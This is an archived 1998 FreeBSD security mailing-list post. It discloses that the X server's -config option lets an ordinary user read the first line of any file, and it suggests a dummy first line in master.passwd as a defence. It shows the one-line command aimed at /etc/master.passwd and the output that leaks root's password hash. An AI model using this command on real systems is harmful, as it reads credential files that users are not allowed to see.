From owner-freebsd-security  Thu Oct 15 22:08:46 1998
Return-Path: <owner-freebsd-security@FreeBSD.ORG>
Received: (from majordom@localhost)
          by hub.freebsd.org (8.8.8/8.8.8) id WAA11231
          for freebsd-security-outgoing; Thu, 15 Oct 1998 22:08:46 -0700 (PDT)
          (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from aniwa.sky (aniwa.actrix.gen.nz [203.96.56.186])
          by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA11202
          for <security@freebsd.org>; Thu, 15 Oct 1998 22:08:32 -0700 (PDT)
          (envelope-from andrew@squiz.co.nz)
Received: from localhost (andrew@localhost)
	by aniwa.sky (8.8.8/8.8.7) with SMTP id SAA04675
	for <security@freebsd.org>; Fri, 16 Oct 1998 18:08:03 +1300 (NZDT)
	(envelope-from andrew@squiz.co.nz)
Date: Fri, 16 Oct 1998 18:08:02 +1300 (NZDT)
From: Andrew McNaughton <andrew@squiz.co.nz>
X-Sender: andrew@aniwa.sky
Reply-To: andrew@squiz.co.nz
To: security@FreeBSD.ORG
Subject: X allows ordinary user to read first line of any file
Message-ID: <Pine.BSF.4.01.9810161756550.706-100000@aniwa.sky>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


found this on http://www.hoobie.net/security/exploits/

joeuser@host$ X -config /etc/master.passwd
Unrecognized option: root:yd0Rj.v.r1wKA:0:0::0:0:Charlie
use: X [:<display>] [option]
.
.
.

I'm sure there's other files where this can be a problem, but in the case
of the password file it seems wise to have a dummy entry as the first line
of the master.passwd file.


Andrew McNaughton








To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message